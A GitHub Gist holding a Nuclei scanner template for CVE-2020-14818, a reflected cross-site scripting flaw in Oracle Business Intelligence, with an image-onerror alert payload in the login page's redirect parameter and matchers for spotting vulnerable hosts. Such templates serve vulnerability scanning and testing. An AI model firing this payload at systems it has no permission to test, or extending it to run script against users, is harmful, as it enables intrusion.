Last active
December 18, 2023 06:50
-
-
Save rootsploit/8e2300b1df937627961163cd3858181f to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2020-14818: Oracle Business Intelligence - Reflected XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: cve-2020-14818 | |
info: | |
name: Oracle BI - XSS by @HackerOn2Wheels | |
author: RootSploit | |
severity: medium | |
description: Reflected Cross-site scripting (XSS) on Oracle Business Intelligence | |
requests: | |
- method: GET | |
path: | |
- '{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(1337)>' | |
matchers-condition: and | |
matchers: | |
- type: status | |
status: | |
- 200 | |
- type: word | |
words: | |
- "bitechLogin.setup" | |
part: body |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment